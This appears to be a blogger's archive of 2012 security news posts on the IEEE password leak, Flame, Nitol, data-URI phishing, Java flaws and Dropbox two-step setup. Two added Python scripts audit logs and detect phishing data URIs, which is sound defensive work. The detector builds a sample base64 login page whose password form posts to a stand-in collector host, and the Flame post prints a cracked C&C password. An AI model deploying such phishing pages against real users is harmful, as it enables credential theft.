All posts by Nithin Ramesh

Nithin is a blogger and a Windows security enthusiast. He is currently pursuing a Bachelor's degree in Electronics and Communication. Apart from technology, his other interests include reading and rock music. His Twitter handle is @nithinr6

Researcher Discovers 100k IEEE User Passwords on Public FTP

If you are a member of IEEE, it might be time for you to change your password.

A Romanian university teaching assistant, Radu Dragusin, has discovered a publicly accessible FTP server that stored around 100,000 usernames and passwords in plain text. The passwords were found in logs stored on the FTP server. There were around 100 GB of logs, containing 376 million HTTP requests. Out of these, 411,308 entries contained passwords.

He reported the vulnerability to IEEE officials on September 24th and they are rectifying the issue at the moment. The FTP server which contained the information has been taken offline and they are sending password reset emails to all those affected. But we are yet to see a public statement from them.

IEEE, if you are not aware, stands for Institute of Electrical and Electronics Engineers and is an international organization that promotes technology and science. Its members include high position holders from various prestigious institutions. Radu says that the logs contained passwords of Apple, Google, IBM, Oracle and Samsung employees, as well as researchers from NASA, Stanford etc. The data is assumed to have been available online for about a month. But it is not certain whether the data has been acquired by hackers.

IEEE officials will have to answer a lot of questions in the coming days. Most importantly, why were passwords stored in plain text? Secondly, why were the FTP server permissions not set correctly, when it contained a massive amount of logs? Hopefully, they will rectify the issues as soon as possible and this should be a cue for others to secure their customers' data.
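The IEEE leak came from web server logs that recorded credentials sent in HTTP requests. As an added example (not code from the original post or from IEEE), the following script audits a few constructed Apache-style access log lines for query-string parameters whose names suggest a credential, and produces a redacted copy of the line so that logs can be retained without the secret. The parameter-name list is an assumption; extend it with the field names your own applications use.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Parameter names that commonly carry credentials (assumption: extend for your own apps).
CREDENTIAL_PARAMS = {"password", "passwd", "pwd", "pass", "passphrase"}

# Request line inside a common-log-format entry: "METHOD TARGET HTTP/x.y".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)"')

# Constructed sample log lines (not real IEEE data).
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Sep/2012:10:01:02 +0000] "GET /login?username=alice&password=hunter2 HTTP/1.1" 302 0',
    '10.0.0.6 - - [24/Sep/2012:10:01:07 +0000] "GET /papers/search?q=fpga HTTP/1.1" 200 5120',
    '10.0.0.7 - - [24/Sep/2012:10:02:15 +0000] "POST /api/auth?user=bob&pwd=s3cret&remember=1 HTTP/1.1" 200 89',
]


def find_credentials(line):
    """Return the credential parameter names present in the request target of one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    return [k for k, _ in parse_qsl(query, keep_blank_values=True)
            if k.lower() in CREDENTIAL_PARAMS]


def redact_line(line):
    """Replace the value of every credential parameter with REDACTED, leaving the rest of the line intact."""
    m = REQUEST_RE.search(line)
    if not m or not find_credentials(line):
        return line
    parts = urlsplit(m.group("target"))
    pairs = [(k, "REDACTED" if k.lower() in CREDENTIAL_PARAMS else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    new_target = urlunsplit(parts._replace(query=urlencode(pairs)))
    return line[:m.start("target")] + new_target + line[m.end("target"):]


def audit(lines):
    """Return (number of lines leaking credentials, list of redacted lines)."""
    leaking = sum(1 for line in lines if find_credentials(line))
    return leaking, [redact_line(line) for line in lines]


if __name__ == "__main__":
    count, cleaned = audit(SAMPLE_LOG)
    print(f"{count} of {len(SAMPLE_LOG)} lines contained credentials")
    for line in cleaned:
        print(line)
```

Run over an existing log, this only tells you how many entries leak; the real fix is upstream, so that credentials are never written to a log in the first place (for example by never accepting passwords in GET query strings), and so that any log directory is not world-readable or exposed by an anonymous FTP share.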

Source: IEEE Log

Flame Command & Control Server Password Cracked

Flame was arguably the next big thing in the state-sponsored malware category after Stuxnet. If you are not aware, Flame is a malware that was used to infect computers in the Middle East for espionage purposes.

Flame was investigated by a joint effort of Kaspersky, Symantec, ITU-IMPACT and CERT-Bund/BSI. Symantec had earlier failed to crack the password of Flame’s Control Centre and had put out a blog post asking for help in cracking the hash, 27934e96d90d06818674b98bec7230fa. Dmitry Bestuzhev of Kaspersky cracked the hash to find the clear text password as 900gage!@#. We are not yet aware of the method he used to crack the hash.

The cracking of the hash allowed the researchers to access the Command-and-Control servers for the Flame malware. Kaspersky has posted a detailed blog post analyzing the C&C. All of the servers were running 64-bit Debian Linux. The programming languages used were PHP, Python and bash, and virtualization was run under OpenVZ.

An initial look at the C&C revealed that the attackers had used a minimal interface with no terms such as bot or botnet, possibly to avoid arousing the hosting company's suspicion. There was also no obvious way to send commands from the C&C interface.

To send a command or set of commands to a victim, the attacker uploaded a specially crafted tar.gz archive, which was processed on the server. A special server script extracted the archive contents and looked for *.news and *.ad files. These files were put into the corresponding directories "news" and "ads". The C&C allows an attacker to push an update to a specific victim, or to all victims at a time. It is possible to prioritize a command, which makes it possible to order commands (for example, collect all data first and only then self-remove). The priority and target client ID were transferred in an unconventional way: they were stored in the filename that the attacker uploaded to the C&C.

The researchers also discovered that the C&C handled four client types – SP, SPE, FL and IP – which were used to communicate with different clients; of these, Flame was identified as FL. This suggests that there are three more Flame-like malware families in the wild which have not been discovered yet.

The analysis of the C&C shows that the servers were first set up on 03 December 2006, which suggests that Flame was operational for much longer than we had first thought. The scripts used by the operators also contained other valuable information: the nicknames of the developers. Kaspersky hasn't published their names and has only identified them as D, H, O and R in the blog post.

You can read more about Kaspersky's analysis of Flame's C&C here and a whitepaper by Symantec on Flame here [PDF].

Microsoft Issues Fix It for Internet Explorer Zero Day Vulnerability

A few days ago, we reported a new vulnerability in Microsoft’s Internet Explorer that could allow an attacker to execute code remotely on an affected PC. The vulnerability had been spreading fast and had been added to free attack tools used by hackers.

Microsoft has now issued an interim solution in the form of a Fix It tool which can be downloaded from here. In a blog post published today, Microsoft's Yunsun Wee says that the tool is a one-click solution that will protect users right away and that it will not hinder users' web browsing in any way. You won't have to reboot your computer either.

Microsoft will be releasing an out-of-band security update, MS12-063, this Friday to close the vulnerability. The update will be rated critical and will address the zero day vulnerability (Security Advisory 2757760) along with four other remote code execution issues. Users who downloaded the Fix It solution need not uninstall it before installing the update.

If you have automatic updates enabled, the update will be installed automatically; if you don't, make sure that you install the update so that your computers are not vulnerable. Also, I highly recommend installing the Fix It solution right now to prevent any zero day attacks.

Microsoft Disrupts Nitol Botnet

In an operation named Operation b70, Microsoft was able to disrupt the Nitol botnet, which was used to spread malware and launch DDoS attacks. The operation was carried out by Microsoft's Digital Crimes Unit with the permission of the U.S. District Court for the Eastern District of Virginia.

The operation was a result of a study conducted by Microsoft which discovered hackers selling pirated copies of Windows that were embedded with malware. They then got these copies into different unsecured supply chains (a distributor or reseller selling products from unconfirmed or unauthorized sources) for distribution. In the research, it was found that about 20% of pirated copies of Windows contained different types of malware.

This malware was used for a multitude of illegal purposes, including stealing passwords and credit card information and even remotely turning on the microphone and webcam connected to the victim's computer.

The computers that were part of the Nitol botnet were controlled by a Nitol command server. The server's DNS was found to be provided by a rogue website called 3322.org, which has been known to be a part of several targeted attacks in the past. With the successful takedown of 3322.org, Microsoft was also able to take down around 500 different strains of malware stored in 70,000 sub-domains of the rogue website.

The operation was part of Microsoft's wider MAPS (Microsoft Active Response for Security) program, which is intended to protect Windows users against malware. This is the second such action against botnets by Microsoft, which had taken down the Zeus botnet earlier this year.

Via: Official Microsoft Blog

GoDaddy Sites Back Online After Outage

A large number of websites that were either hosted or using GoDaddy name servers went down for more than four hours today following an outage in their DNS server. GoDaddy has been working to fix the issue and now it looks like almost all sites are back online.

There is speculation about what caused the glitch, with some blaming it on the online vigilante group Anonymous. A Brazilian Twitter user loosely affiliated with Anonymous even tweeted the following, taking responsibility for the outage.

I'm taking godaddy down because, well, I'd like to test how safe the cyber security is, and for more reasons that I can not talk about now.

GoDaddy has been on the receiving end of similar attacks by Anonymous after its support for the infamous anti-piracy bill SOPA. But we are not yet able to verify whether this outage was a result of any kind of attack, and there's a good chance that this might just be a glitch in their DNS configuration. GoDaddy, while not mentioning whether the outage was a result of a DDoS attack, has tweeted that there was no compromise of user data.

WIRED is also reporting that GoDaddy has migrated some of its DNS records to VeriSign following the outage. It is not yet clear whether they are migrating the entire DNS configuration from the affected server or just the one for GoDaddy's own website, which was also affected by the outage.

Brazilian Trojan Issued Digital Certificate; Revoked Later

Wikipedia defines a digital certificate as ‘an electronic document which uses a digital signature to bind a public key with an identity — information such as the name of a person or an organization, their address, and so forth. The certificate can be used to verify that a public key belongs to an individual.’

In the case of software, it is used to ensure that the software is what it claims to be. Operating systems use digital certificates to make sure that an application that is being installed is valid. But what if the digital certificate is obtained by giving fake information?

There have been cases in the past where malware authors used stolen digital certificates for their rogue apps. But according to a report from Kaspersky, a group of Brazilian Trojan authors was able to obtain genuine certificates from Comodo by using fake data.

The authors used a fake company name, gastecnology.org, for obtaining the certificate. As shown in the Securelist blog, a simple DNS lookup of that particular domain name gives us some clues as to the veracity of that company.

Firstly, the email address used to register the account is a free Yahoo Mail account, and secondly, the phone number as well as the address provided were fake.

After obtaining the digital certificate, the malware authors used an extensive email campaign to spread the malware. The certificate has been revoked since then and the application is now flagged as malware.

Although the certificate was revoked, the big question here is why the certificate was issued in the first place. Since digital certificates play an integral part in verifying the validity of an application, a certificate should only be issued after verifying the submitted data, which was not the case here. Hopefully certification authorities will be more careful after this incident.

Phishing 2.0; Phishing Without Fake Webpages

Nowadays everyone will be familiar with phishing attacks. It is basically the process of obtaining confidential information from a person by communicating with the victim (using emails, phone calls etc.) while posing as someone else. The typical phishing attack involves creating a fake login page, storing it on a server and emailing the victim a link to the fake login page. Now a new research paper from InfoSec student Henning Klevjer shows how a hacker can create phishing attacks without the need to store the fake login page on a server.

This method uses a URI, or uniform resource identifier, which is basically a string of characters used to identify a name or a resource. Using a data URI, the required data (the code for the login page in this case) is stored within the URI itself, with the following scheme:

data:[<mediatype>][;base64],<data>

Here <data> will contain the fake login page. The procedure for creating a phishing URI starts with creating a login page using the code from the original page. The original code is modified so that the entered data, such as the password, is sent to a location desired by the hacker. This page is then encoded using a scheme called Base64. Base64 is a method of encoding binary data into ASCII format, which increases the data size by around 33%. The next and final step is to append this information to the URI.

The final URI will be an extremely long and suspicious-looking one. But as all major browsers support the data URI scheme, it will be rendered properly, as long as it doesn't exceed the maximum URL length allowed by the browser.

Although the large URI can be masked using a URL shortening service, Henning states that this method has some major limitations due to the way data URIs are implemented in Chrome and Internet Explorer.
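Because the whole fake page travels inside the link, a mail gateway or URL filter can inspect it before a user ever clicks. As an added example (not code from the paper or the original post), the following Python script parses the `data:[<mediatype>][;base64],<data>` form described above, decodes the payload, and flags a data URI as suspicious when it carries an HTML document containing a password field; it also reports where any form posts to and shows the roughly 33% Base64 overhead on a constructed sample page. The sample URIs and the `.example` host are constructed for the demonstration.

```python
import base64
import re
from urllib.parse import unquote

# data:[<mediatype>][;base64],<data>  (everything up to the first comma is metadata)
DATA_URI_RE = re.compile(r"^data:(?P<meta>[^,]*),(?P<payload>.*)$", re.DOTALL)
PASSWORD_FIELD_RE = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.IGNORECASE)
FORM_ACTION_RE = re.compile(r"<form[^>]*action\s*=\s*['\"]([^'\"]+)", re.IGNORECASE)


def parse_data_uri(uri):
    """Split a data: URI into (mediatype, is_base64, decoded_bytes). Raises ValueError if malformed."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        raise ValueError("not a data: URI")
    params = m.group("meta").split(";")
    mediatype = params[0] or "text/plain"          # RFC 2397 default when the type is omitted
    is_b64 = "base64" in [p.lower() for p in params[1:]]
    payload = m.group("payload")
    if is_b64:
        data = base64.b64decode(payload, validate=True)  # reject characters outside the Base64 alphabet
    else:
        data = unquote(payload).encode()                 # non-base64 payloads are percent-encoded text
    return mediatype, is_b64, data


def assess_data_uri(uri):
    """Describe why a data: URI looks like a credential-harvesting page (or why it does not)."""
    mediatype, is_b64, body = parse_data_uri(uri)
    text = body.decode("utf-8", errors="replace")
    is_html = mediatype.lower() in ("text/html", "application/xhtml+xml")
    actions = FORM_ACTION_RE.findall(text) if is_html else []
    has_password = bool(PASSWORD_FIELD_RE.search(text)) if is_html else False
    return {
        "mediatype": mediatype,
        "base64": is_b64,
        "encoded_length": len(uri),
        "decoded_length": len(body),
        "form_actions": actions,          # where submitted credentials would be sent
        "suspicious": is_html and has_password,
    }


# Constructed sample: a minimal HTML login form whose action points at a made-up .example host.
SAMPLE_PAGE = (
    "<html><body><form action='http://collector.example/post' method='post'>"
    "<input name='user'><input type='password' name='pass'></form></body></html>"
)
SAMPLE_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_PAGE.encode()).decode()
BENIGN_URI = "data:text/plain,Hello%20World"


def base64_overhead(uri):
    """Ratio of encoded payload length to decoded length (about 1.33 for Base64)."""
    m = DATA_URI_RE.match(uri)
    _, _, body = parse_data_uri(uri)
    return len(m.group("payload")) / len(body)


if __name__ == "__main__":
    for u in (SAMPLE_URI, BENIGN_URI):
        print(assess_data_uri(u))
    print(f"Base64 overhead: {base64_overhead(SAMPLE_URI):.2f}x")
```

In a filtering pipeline the same check should be applied after expanding shortened URLs, since the article notes that shorteners are the obvious way to hide such a long link; a `data:` URI with a password field and no legitimate reason to exist in mail is a strong signal regardless of what the page looks like.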

You can read more about this method here (PDF).

Via: Naked Security

Another day, Another Java Vulnerability Discovered!

So you have read about the recent vulnerabilities discovered in Java that attackers used to spread malware? Have you installed the latest out-of-band update that Oracle released in order to close those vulnerabilities? Think it’s time to move on to other stories? Well, think again.

Computer World is reporting that another serious vulnerability in the latest update has been discovered that could allow an attacker to escape the Java security sandbox and run arbitrary code on your system. The vulnerability was discovered by a Polish security firm called Security Explorations and has been reported to Oracle, according to their CEO, Adam Gowdiak. He has also stated that they will not be releasing any technical details on the vulnerability until Oracle issues a fix.

In an email to IDG News Service, he states,

“Once we found that our complete Java sandbox bypass codes stopped working after the update was applied, we looked again at POC codes and started to think about the possible ways of how to fully break the latest Java update again,” Gowdiak said. “A new idea came, it was verified and it turned out that this was it.”

Oracle hasn't hinted whether they will be releasing an out-of-band update like the previous one or just include the patch in the scheduled October update. With vulnerabilities being discovered at such a fast pace, it might be time for Oracle to reconsider their four-month update cycle. The longer these vulnerabilities remain unfixed, the greater the chance that they will be used to attack users, leaving users at greater risk.

At this moment, the best option for you is to disable Java if you don't really use it. Alternatively, disable Java in your primary browser and use a secondary browser only for the web apps that require Java (and only if you absolutely need those web apps and are sure they are not rogue), so that you don't wander into compromised websites that make use of Java vulnerabilities.

First Cross Platform Trojan Affecting Linux and Mac OS X Revealed

Russian security firm Dr.Web has identified a new Trojan named BackDoor.Wirenet.1 which runs on both Linux as well as Mac OS X. This is the first ever cross platform Trojan that has been discovered to affect both of the aforementioned operating systems.

Not much information is available on this malware yet. But research is ongoing and the Trojan is said to steal passwords from all of the popular browsers such as Safari, Chrome, Opera and Chromium. It also steals passwords from applications such as Thunderbird, SeaMonkey and Pidgin.

According to Dr.Web, when executed, the Trojan copies itself to the user's home directory – that is, %home%/WIFIADAPT.app.app on Mac OS X and ~/WIFIADAPT on Linux.

Cross platform Trojans are not rare. Trojans that affect Windows and Macs have been identified in the past. A recently discovered Trojan checked which operating system the affected user was running and downloaded the payload accordingly. Another one, discovered in May, used an unpatched Java vulnerability to open backdoors on Windows and Mac. But as I mentioned before, this is the first time that a cross platform Trojan affecting Mac and Linux has been discovered. We will be updating this article as more details are released.

Via: Hacker News

How to Enable Two-step Verification for Dropbox

Dropbox has been under fire more than once for their inability to protect users' data. But now it looks like they are finally improving their security. Dropbox has added an option to use two-step verification for all of its users. Here's how to enable it.

First, login to your Dropbox account and open their Security page.

You will find a new option to enable two-step verification at the bottom of the page, as shown below. It will be disabled at the moment. Click Change.

You will have to enter your password to proceed. Then you will see a webpage overlay like the one shown below. Click Get Started.

You can choose to receive the authentication codes as text messages to your phone. Alternatively, if you own a smartphone, you can use an authenticator app to generate authentication codes locally. Select the desired option and click 'Next'.

Now, if you selected the option to receive codes via text message, enter your mobile number; if you chose to use the authenticator app, scan the provided QR code using any supported authenticator app.

When done, click 'Finish'. You have now enabled two-step verification for Dropbox.

You will also have to download and install the latest version of the Dropbox application for your OS, which supports two-factor authentication.